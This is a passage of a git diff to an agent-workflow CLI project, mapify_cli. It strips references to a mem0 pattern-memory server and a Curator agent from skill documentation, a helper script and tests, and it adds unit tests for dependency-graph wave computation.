- "ST-002": ["xml_packet", "mem0_search", "actor", "monitor", "tests", "linter"], - "ST-003": ["xml_packet", "mem0_search", "actor", "monitor", "tests", "linter"] + "ST-001": ["actor", "monitor", "tests", "linter"], + "ST-002": ["xml_packet", "actor", "monitor", "tests", "linter"], + "ST-003": ["xml_packet", "actor", "monitor", "tests", "linter"] }, "subtask_sequence": ["ST-001", "ST-002", "ST-003"] } @@ -126,12 +123,12 @@ Standard step names used in `completed_steps` arrays: "current_subtask": "ST-001", "current_state": "MONITOR_PASSED", "completed_steps": { - "ST-001": ["xml_packet", "mem0_search", "actor", "monitor"] + "ST-001": ["xml_packet", "actor", "monitor"] }, "pending_steps": { "ST-001": ["tests", "linter"], - "ST-002": ["xml_packet", 
"mem0_search", "actor", "monitor", "tests", "linter"], - "ST-003": ["xml_packet", "mem0_search", "actor", "monitor", "tests", "linter"] + "ST-002": ["xml_packet", "actor", "monitor", "tests", "linter"], + "ST-003": ["xml_packet", "actor", "monitor", "tests", "linter"] }, "subtask_sequence": ["ST-001", "ST-002", "ST-003"] } @@ -148,12 +145,12 @@ At this point, workflow-gate.py will **ALLOW** Edit/Write because both "actor" a "current_subtask": "ST-001", "current_state": "SUBTASK_COMPLETE", "completed_steps": { - "ST-001": ["xml_packet", "mem0_search", "actor", "monitor", "tests", "linter"] + "ST-001": ["xml_packet", "actor", "monitor", "tests", "linter"] }, "pending_steps": { "ST-001": [], - "ST-002": ["xml_packet", "mem0_search", "actor", "monitor", "tests", "linter"], - "ST-003": ["xml_packet", "mem0_search", "actor", "monitor", "tests", "linter"] + "ST-002": ["xml_packet", "actor", "monitor", "tests", "linter"], + "ST-003": ["xml_packet", "actor", "monitor", "tests", "linter"] }, "subtask_sequence": ["ST-001", "ST-002", "ST-003"] } diff --git a/src/mapify_cli/templates/skills/map-cli-reference/SKILL.md b/src/mapify_cli/templates/skills/map-cli-reference/SKILL.md index 13ba2b5..2a993c4 100644 --- a/src/mapify_cli/templates/skills/map-cli-reference/SKILL.md +++ b/src/mapify_cli/templates/skills/map-cli-reference/SKILL.md @@ -1,21 +1,18 @@ --- name: map-cli-reference description: >- - Quick reference for mapify CLI and mem0 MCP usage errors. Use when + Quick reference for mapify CLI usage errors. Use when encountering "no such command", "no such option", "parameter not found", - or when user asks "how to use mapify", "mem0 commands", "validate graph". + or when user asks "how to use mapify", "validate graph". Do NOT use for workflow selection (use map-workflows-guide) or planning methodology (use map-planning). 
metadata: author: azalio version: 3.1.0 - mcp-server: mem0 --- # MAP CLI Quick Reference -> **Note (v4.0+):** Pattern storage and retrieval uses mem0 MCP (tiered namespaces). - Fast lookup for commands, parameters, and common error corrections. **For comprehensive documentation**, see: @@ -26,16 +23,6 @@ Fast lookup for commands, parameters, and common error corrections. ## Quick Command Index -### Pattern Search (mem0 MCP) - -```bash -# Tiered search across namespaces (branch → project → org) -mcp__mem0__map_tiered_search(query="JWT authentication", limit=5) - -# Use section_filter when you know the category -mcp__mem0__map_tiered_search(query="input validation", section_filter="SECURITY_PATTERNS", limit=10) -``` - ### Validate Commands ```bash @@ -75,58 +62,6 @@ mapify upgrade **Solution**: - The `playbook` command was removed in v4.0+ -- For pattern retrieval: use `mcp__mem0__map_tiered_search` -- For pattern writes: use `Task(subagent_type="curator", ...)` - ---- - -### Error 2: MCP Tool Not Available - -**Issue**: mem0 calls return empty results or tool invocation fails. - -**Solution**: -- Verify mem0 MCP is configured and enabled in `.claude/mcp_config.json` (or Claude settings) -- Confirm the org/project/branch namespaces match your workflow conventions - ---- - -### Error 3: Wrong Approach (CRITICAL) - -❌ **WRONG**: Writing patterns directly (ad-hoc scripts / manual storage) - -✅ **CORRECT**: Use Curator agent: - -```bash -Task(subagent_type="curator", ...) -``` - -Curator must: -- Search duplicates first via `mcp__mem0__map_tiered_search` -- Store new patterns via `mcp__mem0__map_add_pattern` -- Archive outdated patterns via `mcp__mem0__map_archive_pattern` - ---- - -## Integration with MAP Workflows (v4.0+) - -### Curator Agent - -**Role**: Stores patterns in mem0 MCP - -**Workflow**: -1. Curator analyzes reflector insights -2. Checks for duplicates via `mcp__mem0__map_tiered_search` -3. Stores new patterns via `mcp__mem0__map_add_pattern` -4. 
Archives outdated patterns via `mcp__mem0__map_archive_pattern` - -### Reflector Agent - -**Role**: Searches for existing patterns before extracting new ones - -**MCP tool used**: -```bash -mcp__mem0__map_tiered_search(query="error handling", limit=5) -``` --- @@ -156,10 +91,9 @@ mcp__mem0__map_tiered_search(query="error handling", limit=5) **Actions:** 1. Identify error type — removed command usage -2. Explain: `playbook` command was removed in v4.0+, replaced by mem0 MCP -3. Provide replacement: `mcp__mem0__map_tiered_search` for reads, `Task(subagent_type="curator", ...)` for writes +2. Explain: `playbook` command was removed in v4.0+ -**Result:** User switches to mem0 MCP tools, error resolved. +**Result:** User acknowledges the removed command. ### Example 2: Validating a dependency graph @@ -172,28 +106,15 @@ mcp__mem0__map_tiered_search(query="error handling", limit=5) **Result:** User validates their task plan and fixes dependency issues before running workflow. -### Example 3: mem0 MCP not responding - -**User says:** "mem0 tiered search returns empty results" - -**Actions:** -1. Check mem0 MCP configuration in `.claude/mcp_config.json` -2. Verify namespace conventions (org/project/branch) -3. Test with broad query: `mcp__mem0__map_tiered_search(query="test", limit=1)` - -**Result:** User identifies configuration issue and restores mem0 connectivity. 
- --- ## Troubleshooting | Issue | Cause | Solution | |-------|-------|----------| -| `No such command 'playbook'` | Removed in v4.0+ | Use `mcp__mem0__map_tiered_search` for pattern retrieval | +| `No such command 'playbook'` | Removed in v4.0+ | Command no longer available | | `No such option '--output'` | Wrong subcommand syntax | Check `mapify --help` for valid options | -| mem0 tool invocation fails | MCP server not configured | Add mem0 to `.claude/mcp_config.json` and restart | | `validate graph` exit code 2 | Malformed JSON input | Validate JSON with `python -m json.tool < file.json` | -| Patterns not persisting | Writing directly instead of via Curator | Always use `Task(subagent_type="curator", ...)` for pattern writes | | `mapify init` overwrites files | Using `--force` flag | Omit `--force` to preserve existing configuration | --- diff --git a/src/mapify_cli/templates/skills/map-cli-reference/scripts/check-command.sh b/src/mapify_cli/templates/skills/map-cli-reference/scripts/check-command.sh index 216c959..f7efaa4 100755 --- a/src/mapify_cli/templates/skills/map-cli-reference/scripts/check-command.sh +++ b/src/mapify_cli/templates/skills/map-cli-reference/scripts/check-command.sh @@ -31,11 +31,11 @@ if [ -z "$SUBCOMMAND" ]; then echo " validate - Validate dependency graphs" echo "" echo "Removed subcommands:" - echo " playbook - Removed in v4.0+ (use mem0 MCP)" + echo " playbook - Removed in v4.0+" exit 1 fi -# Removed subcommands (replaced by mem0 MCP in v4.0+) +# Removed subcommands REMOVED_COMMANDS="playbook" # Known valid commands @@ -44,16 +44,7 @@ VALID_COMMANDS="init check upgrade validate" # Check removed commands first for dep in $REMOVED_COMMANDS; do if [ "$SUBCOMMAND" = "$dep" ]; then - echo "ERROR: '$SUBCOMMAND' was removed in v4.0+ (use mem0 MCP instead)" - echo "" - echo "Replacements:" - case "$SUBCOMMAND" in - playbook) - echo " Pattern retrieval: mcp__mem0__map_tiered_search(query=\"...\", limit=5)" - echo " Pattern storage: 
Task(subagent_type=\"curator\", ...)" - echo " Pattern archival: mcp__mem0__map_archive_pattern(...)" - ;; - esac + echo "ERROR: '$SUBCOMMAND' was removed in v4.0+" exit 2 fi done diff --git a/src/mapify_cli/templates/skills/map-workflows-guide/SKILL.md b/src/mapify_cli/templates/skills/map-workflows-guide/SKILL.md index 6e5a1e5..5ad77c2 100644 --- a/src/mapify_cli/templates/skills/map-workflows-guide/SKILL.md +++ b/src/mapify_cli/templates/skills/map-workflows-guide/SKILL.md @@ -11,7 +11,6 @@ version: 1.0 metadata: author: azalio version: 3.1.0 - mcp-server: mem0 --- # MAP Workflows Guide @@ -79,14 +78,12 @@ Answer these 5 questions to find your workflow: - ✅ Basic validation (Monitor checks correctness) - ❌ NO quality scoring (Evaluator skipped) - ❌ NO impact analysis (Predictor skipped entirely) -- ❌ NO learning (Reflector/Curator skipped) +- ❌ NO learning (Reflector skipped) **Trade-offs:** - Saves 50-60% tokens vs full pipeline (every agent per subtask) -- mem0 never improves (no patterns stored) - Knowledge never accumulates - Minimal quality gates (only basic checks) -- Cannot reuse learned patterns in future tasks **Example tasks:** - "Fix a small validation edge case" @@ -121,11 +118,11 @@ Answer these 5 questions to find your workflow: - ✅ Impact analysis (Predictor runs conditionally) - ✅ Tests gate + Linter gate per subtask - ✅ Final-Verifier (adversarial verification at end) -- ✅ **Learning via /map-learn** (Reflector/Curator, optional after workflow) +- ✅ **Learning via /map-learn** (Reflector, optional after workflow) **Optimization strategy:** - **Conditional Predictor:** Runs only if risk detected (security, breaking changes) -- **Batched Learning:** Reflector/Curator run ONCE after all subtasks complete +- **Batched Learning:** Reflector runs ONCE after all subtasks complete - **Result:** 35-40% token savings vs full pipeline while preserving learning - **Same quality gates:** Monitor still validates each subtask @@ -151,7 +148,6 @@ Despite token 
optimization, preserves: - Per-subtask validation (Monitor always checks) - Complete implementation feedback loops - Full learning (batched, not skipped) -- mem0 pattern growth from all tasks **See also:** [resources/map-efficient-deep-dive.md](resources/map-efficient-deep-dive.md) @@ -171,7 +167,7 @@ Despite token optimization, preserves: - ✅ Validation (Monitor verifies fix) - ✅ Root cause analysis - ✅ Impact assessment (Predictor) -- ✅ Learning (Reflector/Curator) +- ✅ Learning (Reflector) **Specialized features:** - Error log analysis @@ -233,8 +229,7 @@ MAP workflows orchestrate **12 specialized agents**, each with specific responsi **Actor** — Writes code and implements - Generates implementation - Makes file changes -- Uses existing patterns from mem0 -- Queries mem0 for relevant knowledge +- Uses existing patterns from previous workflows **Monitor** — Validates correctness - Checks implementation against criteria @@ -263,18 +258,10 @@ MAP workflows orchestrate **12 specialized agents**, each with specific responsi **Reflector** — Pattern extraction - Analyzes what worked and failed - Extracts reusable patterns -- Searches mem0 for existing knowledge via `mcp__mem0__map_tiered_search` -- Prevents duplicate pattern storage +- Prevents duplicate pattern extraction - **Batched in /map-efficient** (runs once at end, via /map-learn) - **Skipped in /map-fast** (no learning) -**Curator** — Knowledge management -- Stores patterns in mem0 via `mcp__mem0__map_add_pattern` -- Deduplicates via tiered search -- Archives outdated patterns via `mcp__mem0__map_archive_pattern` -- Maintains pattern metadata -- **Batched in /map-efficient** (runs once at end) - ### Optional Agent **Documentation-Reviewer** — Documentation validation @@ -389,27 +376,6 @@ Predictor runs if: - High complexity estimated - Multiple files affected -**Q: How does the mem0 tiered memory system work?** - -A: mem0 MCP provides tiered pattern storage: - -**L1 (Branch-scoped)** -- Patterns specific to 
current feature branch -- Experimental patterns for current work -- Fastest access - -**L2 (Project-scoped)** -- Shared project knowledge -- Validated patterns used across branches -- Standard access - -**L3 (Org-scoped)** -- Cross-project patterns -- Organizational best practices -- Broadest scope - -Search flows: L1 → L2 → L3 (most specific first) - --- ## Resources & Deep Dives @@ -496,10 +462,8 @@ MAP: 📚 Loads this skill for context 1. **Default to /map-efficient** — It's the recommended choice for 80% of tasks 2. **Use /map-fast sparingly** — Only for small, low-risk changes with clear scope 3. **Use /map-efficient for critical paths** — Describe risk context in the task description for appropriate Predictor triggers -4. **Monitor pattern growth** — Use mem0 search to see learning improving -5. **Trust the optimization** — /map-efficient preserves quality while cutting token usage -6. **Review deep dives** — When in doubt, check the appropriate deep-dive resource -7. **Leverage mem0 patterns** — Stored patterns from previous tasks via tiered search +4. **Trust the optimization** — /map-efficient preserves quality while cutting token usage +5. **Review deep dives** — When in doubt, check the appropriate deep-dive resource --- @@ -555,7 +519,6 @@ MAP: 📚 Loads this skill for context | Wrong workflow chosen mid-task | Cannot switch workflows during execution | Complete current workflow, then restart with correct one | | Predictor never runs in /map-efficient | Subtasks assessed as low-risk | Expected behavior; Predictor is conditional. 
Use /map-debug for guaranteed analysis | | No patterns stored after /map-fast | /map-fast skips learning agents | By design — use /map-efficient + /map-learn for pattern accumulation | -| mem0 search returns empty | mem0 MCP not configured or namespaces mismatch | Verify mem0 in `.claude/mcp_config.json`, check namespace conventions | | Skill suggests wrong workflow | Description trigger mismatch | Check skill-rules.json triggers; refine query wording | --- diff --git a/src/mapify_cli/templates/skills/map-workflows-guide/resources/agent-architecture.md b/src/mapify_cli/templates/skills/map-workflows-guide/resources/agent-architecture.md index d4a8d25..1b8b212 100644 --- a/src/mapify_cli/templates/skills/map-workflows-guide/resources/agent-architecture.md +++ b/src/mapify_cli/templates/skills/map-workflows-guide/resources/agent-architecture.md @@ -1,6 +1,6 @@ # Agent Architecture -MAP Framework orchestrates 12 specialized agents in a coordinated workflow. +MAP Framework orchestrates 11 specialized agents in a coordinated workflow. ## Agent Categories @@ -14,7 +14,7 @@ MAP Framework orchestrates 12 specialized agents in a coordinated workflow. **2. Actor** - **Role:** Implements code changes -- **Input:** Subtask description, acceptance criteria, mem0 pattern context +- **Input:** Subtask description, acceptance criteria - **Output:** Code changes, rationale, test strategy - **When it runs:** For each subtask (multiple times if revisions needed) @@ -53,16 +53,6 @@ MAP Framework orchestrates 12 specialized agents in a coordinated workflow. - **When it runs:** - /map-efficient, /map-debug, /map-debate: Batched (once at end, via /map-learn) - /map-fast: Never (skipped) -- **MCP Tool:** Uses `mcp__mem0__map_tiered_search` to check for existing patterns - -**7. 
Curator** -- **Role:** Updates memory with validated patterns -- **Input:** Reflector insights -- **Output:** Delta operations (ADD/UPDATE/ARCHIVE patterns) -- **When it runs:** After Reflector -- **MCP Tools:** - - `mcp__mem0__map_tiered_search` to deduplicate - - `mcp__mem0__map_add_pattern` to store new patterns ### Optional @@ -121,7 +111,7 @@ TaskDecomposer ↓ Final-Verifier (adversarial verification of entire goal) ↓ - Done! Optional: /map-learn → Reflector → Curator + Done! Optional: /map-learn → Reflector ``` ### Multi-Variant Pipeline (map-debate) @@ -135,7 +125,7 @@ TaskDecomposer Monitor → [Predictor if high risk] → Apply changes ↓ Batch learning (via /map-learn): - Reflector (all subtasks) → Curator → Done + Reflector (all subtasks) → Done ``` --- @@ -193,7 +183,6 @@ Otherwise: Skipped (token savings) ### Workflow State - All subtask results - Aggregated patterns (Reflector) -- mem0 delta operations (Curator) --- @@ -223,8 +212,8 @@ Agents communicate via structured JSON: - Actor iterates (max 3-5 attempts) - If still failing: Mark subtask as failed, continue with others -### MCP Tool Failures -- Reflector/Curator gracefully degrade +### Learning Failures +- Reflector gracefully degrades - Learning skipped but implementation continues - Logged to stderr for debugging @@ -242,7 +231,6 @@ Agents communicate via structured JSON: | Evaluator | ~0.8K | Per subtask | map-debug, map-review | | Predictor | ~1.5K | Per subtask or conditional | Varies | | Reflector | ~2K | Per subtask or batched | Varies | -| Curator | ~1.5K | After Reflector | Varies | | Debate-Arbiter | ~3-4K | Per subtask | map-debate only | | Synthesizer | ~2K | Per subtask | map-efficient (--self-moa) | | Research-Agent | ~2-3K | Once (before Actor) | map-plan, map-efficient, map-debug | @@ -251,7 +239,7 @@ Agents communicate via structured JSON: **map-efficient savings:** - Skip Evaluator: ~0.8K per subtask - Conditional Predictor: ~1.5K per low-risk subtask -- Batch Reflector/Curator: 
~(N-1) × 3.5K for N subtasks +- Batch Reflector: ~(N-1) × 2K for N subtasks --- diff --git a/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-debug-deep-dive.md b/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-debug-deep-dive.md index 37e5aab..959e188 100644 --- a/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-debug-deep-dive.md +++ b/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-debug-deep-dive.md @@ -39,7 +39,7 @@ - How was it fixed? - How to prevent similar bugs? -4. Curator documents: + Reflector also documents: - Debugging techniques used - Common pitfalls - Prevention strategies @@ -152,9 +152,6 @@ Reflector: ├─ Solution: "Use mutex for critical sections" └─ Prevention: "Design for immutability" -Curator: -├─ ADD "debug-0042: Async race condition patterns" -└─ ADD "impl-0099: Use immutable state updates" ``` --- @@ -221,7 +218,7 @@ Root cause: Improper async error handling 2. What test was missing? 3. What pattern should we follow? 
-**Curator documents:** +**Reflector documents:** ```json { "type": "TESTING_STRATEGY", diff --git a/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-efficient-deep-dive.md b/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-efficient-deep-dive.md index 1e69fbf..6a2afb0 100644 --- a/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-efficient-deep-dive.md +++ b/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-efficient-deep-dive.md @@ -34,15 +34,15 @@ Subtask 3: Add unit tests (tests/auth.test.ts) → Predictor: ⏭️ SKIPPED (test file, no side effects) ``` -### Reflector/Curator: Batched Learning +### Reflector: Batched Learning **Full pipeline (theoretical baseline):** ``` -Subtask 1 → Actor → Monitor → Predictor → Evaluator → Reflector → Curator -Subtask 2 → Actor → Monitor → Predictor → Evaluator → Reflector → Curator -Subtask 3 → Actor → Monitor → Predictor → Evaluator → Reflector → Curator +Subtask 1 → Actor → Monitor → Predictor → Evaluator → Reflector +Subtask 2 → Actor → Monitor → Predictor → Evaluator → Reflector +Subtask 3 → Actor → Monitor → Predictor → Evaluator → Reflector ``` -Result: 3 × (Predictor + Evaluator + Reflector + Curator) cycles +Result: 3 × (Predictor + Evaluator + Reflector) cycles **Optimized workflow (/map-efficient):** ``` @@ -53,9 +53,9 @@ Subtask 3 → Actor → Monitor → [Predictor if high risk] → Apply Final-Verifier (adversarial verification) ↓ Done! Optionally run /map-learn: - Reflector (analyzes ALL subtasks) → Curator (consolidates patterns) + Reflector (analyzes ALL subtasks, consolidates patterns) ``` -Result: No Evaluator, no per-subtask Reflector/Curator. Learning decoupled to /map-learn. +Result: No Evaluator, no per-subtask Reflector. Learning decoupled to /map-learn. **Token savings:** 35-40% vs full pipeline @@ -91,7 +91,7 @@ Result: No Evaluator, no per-subtask Reflector/Curator. 
Learning decoupled to /m **What's optimized (intentionally omitted per-subtask):** - Evaluator — Monitor validates correctness directly -- Reflector/Curator — decoupled to /map-learn (optional, run after workflow) +- Reflector — decoupled to /map-learn (optional, run after workflow) --- @@ -139,13 +139,9 @@ Final-Verifier: ✅ All subtasks verified, goal achieved Optional /map-learn: Reflector (batched): ├─ Analyzed: 3 subtasks - ├─ Searched mem0: Found similar pagination patterns - └─ Extracted: pagination pattern, API versioning, test structure - - Curator (batched): - ├─ Checked duplicates: 2 similar bullets found - ├─ Added: 1 new bullet (API pagination pattern) - └─ Updated: 1 existing bullet (test coverage++) + ├─ Found similar pagination patterns + ├─ Extracted: pagination pattern, API versioning, test structure + └─ Consolidated: 1 new pattern (API pagination), 1 updated (test coverage++) ``` **Token usage:** @@ -192,7 +188,7 @@ BATCH_SIZE = None # or 5 for large tasks **Fix:** Review `subtask.modifies_critical_files()` logic **Issue:** Learning not happening -**Cause:** Reflector/Curator not running +**Cause:** Reflector not running **Fix:** Check workflow completion (must finish all subtasks) **Issue:** Token usage higher than expected diff --git a/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-fast-deep-dive.md b/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-fast-deep-dive.md index 08161fe..dce9fc9 100644 --- a/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-fast-deep-dive.md +++ b/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-fast-deep-dive.md @@ -45,11 +45,6 @@ - Failures not documented - Knowledge not extracted -**Curator (mem0 Pattern Updates)** -- No mem0 patterns created -- No pattern synchronization -- No cross-project learning - ### What Remains **Actor + Monitor:** @@ -70,7 +65,6 @@ | Evaluator | ~0.8K | ❌ Skipped | | Predictor | ~1.5K | ❌ Skipped | | Reflector | ~2K | ❌ 
Skipped | -| Curator | ~1.5K | ❌ Skipped | **Total saved:** ~5.8K per subtask **Percentage:** 40-50% vs full pipeline @@ -96,7 +90,7 @@ ST-1: Setup React Query client Actor → Monitor → Apply ST-2: Test with one API endpoint Actor → Monitor → Apply -Done. No Evaluator, no Reflector, no Curator, no patterns learned. +Done. No Evaluator, no Reflector, no patterns learned. ``` **Appropriate because:** @@ -121,7 +115,7 @@ Risk: High (security, breaking changes) **Problems with using map-fast:** 1. No Predictor → Breaking changes undetected 2. No Reflector → Security patterns not learned -3. No Curator → Team doesn't learn from mistakes +3. No learning → Team doesn't learn from mistakes 4. High risk for under-validation mindset **Correct choice:** `/map-efficient` (critical infrastructure) diff --git a/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-feature-deep-dive.md b/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-feature-deep-dive.md index d0a2f80..9b84fdf 100644 --- a/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-feature-deep-dive.md +++ b/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-feature-deep-dive.md @@ -34,14 +34,13 @@ For each subtask: 4. Evaluator scores quality 5. If approved: 5a. Reflector extracts patterns - 5b. Curator stores patterns in mem0 - 5c. Apply changes + 5b. Apply changes 6. 
If not approved: Return to Actor ``` **Key difference from /map-efficient:** - Predictor runs EVERY subtask (not conditional) -- Reflector/Curator run AFTER EVERY subtask (not batched) +- Reflector runs AFTER EVERY subtask (not batched) --- @@ -54,11 +53,10 @@ For each subtask: Subtask 1: Implement JWT generation ↓ completed Reflector: "JWT secret storage pattern" -Curator: Add pattern "impl-0099: Store secrets in env vars" - ↓ mem0 updated + ↓ pattern extracted Subtask 2: Implement JWT validation ↓ starts -Actor queries mem0: Finds "impl-0099" +Actor uses learned pattern ↓ applies pattern Uses env vars (learned from Subtask 1) ``` @@ -70,10 +68,10 @@ Uses env vars (learned from Subtask 1) **Per-subtask (/map-feature):** - ✅ Immediate pattern application - ✅ Error correction within workflow -- ❌ Higher token cost (N × Reflector/Curator) +- ❌ Higher token cost (N × Reflector) **Batched (/map-efficient):** -- ✅ Lower token cost (1 × Reflector/Curator) +- ✅ Lower token cost (1 × Reflector) - ⚠️ Patterns applied in next workflow - ✅ Holistic insights (sees all subtasks together) @@ -109,19 +107,16 @@ ST-1: OAuth2 provider config ├─ Predictor: ✅ RAN (security-sensitive) │ └─ Impact: Config must not be committed ├─ Evaluator: ✅ Approved (score: 9/10) -├─ Reflector: Pattern "Store OAuth secrets in env" -└─ Curator: ADD "sec-0042: OAuth secrets in .env" +└─ Reflector: Pattern "Store OAuth secrets in env" ST-2: Authorization code flow ├─ Actor: Implement auth/oauth.ts -│ └─ Queries mem0: Finds "sec-0042" │ └─ Uses .env for secrets (learned from ST-1!) 
├─ Monitor: ✅ Valid ├─ Predictor: ✅ RAN (affects auth flow) │ └─ Impact: All protected routes need update ├─ Evaluator: ✅ Approved (score: 9/10) -├─ Reflector: Pattern "PKCE for public clients" -└─ Curator: ADD "sec-0043: Use PKCE extension" +└─ Reflector: Pattern "PKCE for public clients" [ST-3, ST-4, ST-5 continue with same pattern] ``` @@ -209,7 +204,7 @@ ST-2: Authorization code flow - ✅ No security vulnerabilities **Knowledge captured:** -- ✅ mem0 patterns created (N subtasks → N+ patterns) +- ✅ Patterns extracted (N subtasks → N+ patterns) - ✅ Team can apply patterns immediately **Impact understood:** @@ -225,9 +220,9 @@ ST-2: Authorization code flow **Cause:** Per-subtask learning overhead **Solution:** Consider /map-efficient for next similar task -**Issue:** Too many mem0 patterns created +**Issue:** Too many patterns created **Cause:** Reflector suggesting redundant patterns -**Solution:** Curator should check for duplicates more aggressively +**Solution:** Review and deduplicate patterns more aggressively **Issue:** Predictor always says "high risk" **Cause:** Overly conservative risk assessment @@ -238,4 +233,3 @@ ST-2: Authorization code flow **See also:** - [map-efficient-deep-dive.md](map-efficient-deep-dive.md) - Optimized alternative - [agent-architecture.md](agent-architecture.md) - Understanding all agents -- [mem0 tiered search](../../map-cli-reference/SKILL.md) - How knowledge is stored and retrieved diff --git a/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-refactor-deep-dive.md b/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-refactor-deep-dive.md index 2faed47..8865244 100644 --- a/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-refactor-deep-dive.md +++ b/src/mapify_cli/templates/skills/map-workflows-guide/resources/map-refactor-deep-dive.md @@ -53,8 +53,6 @@ Refactoring = Changing structure WITHOUT changing behavior - What patterns emerged? - What dependencies were discovered? 
- What risks were mitigated? - -4. Curator documents: - Refactoring techniques - Dependency patterns - Migration strategies @@ -203,9 +201,6 @@ Reflector: ├─ Pattern: "Use dependency injection for services" └─ Technique: "Incremental refactoring (6 safe steps)" -Curator: -├─ ADD "arch-0042: Controller-Service pattern" -└─ ADD "refactor-0099: Incremental extraction technique" ``` **Token usage:** ~9K tokens (6 subtasks, Predictor always runs) diff --git a/src/mapify_cli/templates/skills/skill-rules.json b/src/mapify_cli/templates/skills/skill-rules.json index 20aac1d..6212eeb 100644 --- a/src/mapify_cli/templates/skills/skill-rules.json +++ b/src/mapify_cli/templates/skills/skill-rules.json @@ -52,23 +52,22 @@ "type": "domain", "enforcement": "suggest", "priority": "high", - "description": "CLI and MCP error corrections", + "description": "CLI error corrections", "promptTriggers": { "keywords": [ "mapify command", "mapify error", "no such command", "no such option", - "mem0 mcp", "validate graph", "mapify init", "mapify check" ], "intentPatterns": [ - "(mapify|mem0).*(error|command|help|usage)", + "mapify.*(error|command|help|usage)", "(no such).*(command|option)", "validate.*(graph|dependency)", - "(how to|how do).*(mapify|mem0)" + "(how to|how do).*mapify" ] } } diff --git a/tests/test_agent_cli_correctness.py b/tests/test_agent_cli_correctness.py index c7108a7..965bb16 100644 --- a/tests/test_agent_cli_correctness.py +++ b/tests/test_agent_cli_correctness.py @@ -65,7 +65,7 @@ def test_agents_have_cli_reference(self, agent_files): warnings = [] # Agents that should have CLI guidance - cli_heavy_agents = ["actor.md", "reflector.md", "curator.md"] + cli_heavy_agents = ["actor.md", "reflector.md"] for agent_file in agent_files: if agent_file.name in cli_heavy_agents: diff --git a/tests/test_command_templates.py b/tests/test_command_templates.py index 82dc329..11b0afb 100644 --- a/tests/test_command_templates.py +++ b/tests/test_command_templates.py @@ -120,9 +120,8 
@@ def test_map_fast_workflow_structure(self, templates_commands_dir): assert "Actor" in content or "actor" in content assert "Monitor" in content or "monitor" in content - # Check that Reflector/Curator are mentioned as SKIPPED + # Check that Reflector is mentioned as SKIPPED assert "reflector" in content.lower(), "Should mention Reflector (as skipped)" - assert "curator" in content.lower(), "Should mention Curator (as skipped)" assert ( "skipped" in content.lower() or "no learning" in content.lower() ), "Should indicate learning is skipped" @@ -231,11 +230,6 @@ def test_three_agent_task_calls(self, review_content): assert 'subagent_type="predictor"' in review_content assert 'subagent_type="evaluator"' in review_content - def test_four_mem0_queries(self, review_content): - """Command includes at least 4 mem0 tiered search queries.""" - count = review_content.count("map_tiered_search") - assert count >= 4, f"Expected at least 4 mem0 queries, found {count}" - def test_ci_mode_flag(self, review_content): """Command documents --ci flag for CI mode.""" assert "--ci" in review_content diff --git a/tests/test_dependency_graph.py b/tests/test_dependency_graph.py index 4b72e58..5c3dddf 100644 --- a/tests/test_dependency_graph.py +++ b/tests/test_dependency_graph.py @@ -203,5 +203,153 @@ def test_topological_sort_valid_dag(self): assert result.index("ST-002") < result.index("ST-003") +class TestComputeWaves: + """Tests for compute_waves() - topological wave computation.""" + + def test_linear_chain_produces_single_subtask_waves(self): + """Linear chain: each subtask in its own wave.""" + graph = DependencyGraph() + graph.add_node(SubtaskNode(id="ST-001", dependencies=[])) + graph.add_node(SubtaskNode(id="ST-002", dependencies=["ST-001"])) + graph.add_node(SubtaskNode(id="ST-003", dependencies=["ST-002"])) + + waves = graph.compute_waves() + assert waves == [["ST-001"], ["ST-002"], ["ST-003"]] + + def test_fan_out_produces_parallel_wave(self): + """Fan-out: root node then 
all dependents in one wave.""" + graph = DependencyGraph() + graph.add_node(SubtaskNode(id="ST-001", dependencies=[])) + graph.add_node(SubtaskNode(id="ST-002", dependencies=["ST-001"])) + graph.add_node(SubtaskNode(id="ST-003", dependencies=["ST-001"])) + graph.add_node(SubtaskNode(id="ST-004", dependencies=["ST-001"])) + + waves = graph.compute_waves() + assert waves == [["ST-001"], ["ST-002", "ST-003", "ST-004"]] + + def test_diamond_produces_three_waves(self): + """Diamond DAG: root, two parallel, then merge node.""" + graph = DependencyGraph() + graph.add_node(SubtaskNode(id="ST-001", dependencies=[])) + graph.add_node(SubtaskNode(id="ST-002", dependencies=["ST-001"])) + graph.add_node(SubtaskNode(id="ST-003", dependencies=["ST-001"])) + graph.add_node(SubtaskNode(id="ST-004", dependencies=["ST-002", "ST-003"])) + + waves = graph.compute_waves() + assert waves == [["ST-001"], ["ST-002", "ST-003"], ["ST-004"]] + + def test_cycle_returns_none(self): + """Cycle in graph should return None.""" + graph = DependencyGraph() + graph.add_node(SubtaskNode(id="ST-001", dependencies=["ST-002"])) + graph.add_node(SubtaskNode(id="ST-002", dependencies=["ST-001"])) + + assert graph.compute_waves() is None + + def test_empty_graph_returns_empty_list(self): + """Empty graph returns empty list.""" + graph = DependencyGraph() + assert graph.compute_waves() == [] + + def test_single_node_returns_single_wave(self): + """Single node returns one wave with one element.""" + graph = DependencyGraph() + graph.add_node(SubtaskNode(id="ST-001", dependencies=[])) + + assert graph.compute_waves() == [["ST-001"]] + + def test_multiple_roots_in_first_wave(self): + """Multiple independent roots all appear in wave 0.""" + graph = DependencyGraph() + graph.add_node(SubtaskNode(id="ST-001", dependencies=[])) + graph.add_node(SubtaskNode(id="ST-002", dependencies=[])) + graph.add_node(SubtaskNode(id="ST-003", dependencies=["ST-001", "ST-002"])) + + waves = graph.compute_waves() + assert waves == 
